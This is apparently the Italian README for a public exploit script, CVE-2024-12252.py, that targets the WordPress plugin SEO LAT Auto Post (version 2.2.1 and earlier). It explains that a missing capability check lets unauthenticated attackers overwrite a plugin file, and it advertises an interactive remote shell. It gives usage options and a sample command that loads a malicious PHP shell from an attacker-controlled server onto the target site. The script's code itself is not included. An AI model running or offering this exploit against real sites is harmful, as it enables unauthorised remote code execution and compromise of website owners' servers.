
SEO LAT Auto Post <= 2.2.1 - Autorizzazione mancante per sovrascrittura/caricamento di file (Esecuzione di codice remoto)
Il plugin SEO LAT Auto Post per WordPress è vulnerabile alla sovrascrittura di file a causa di una mancata verifica delle capability sull'azione AJAX remote_update in tutte le versioni fino alla 2.2.1 inclusa. Ciò consente ad attaccanti non autenticati di sovrascrivere il file seo-beginner-auto-post.php, che può essere sfruttato per ottenere l'esecuzione di codice remoto.
Questo script sfrutta la vulnerabilità nel plugin SEO LAT Auto Post per ottenere l'esecuzione di codice remoto sovrascrivendo il file seo-beginner-auto-post.php. Lo script automatizza il processo di verifica della versione del plugin, l'attivazione dell'exploit e la fornitura di una shell interattiva per l'esecuzione dei comandi.
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
Esegui lo script con l'URL di destinazione e l'URL della tua shell PHP dannosa:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php